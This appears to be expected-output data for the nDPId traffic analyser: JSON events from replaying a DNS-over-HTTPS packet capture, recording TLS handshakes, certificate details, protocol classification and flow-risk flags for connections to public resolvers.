00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"}
00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="}
00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="}
01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}}
00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739354159,"flow_last_seen":946739364932,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":5263,"flow_avg_l4_payload_len":328,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739380697,"flow_last_seen":946739410804,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2838,"flow_tot_l4_payload_len":5244,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"1.0.0.1","src_port":53802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739400581,"flow_last_seen":946739430677,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5345,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739400294,"flow_last_seen":946739430460,"flow_idle_time":7440000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5037,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":946739661512,"flow_last_seen":946739691599,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":4770,"flow_avg_l4_payload_len":366,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739374011,"flow_last_seen":946739404206,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":5512,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
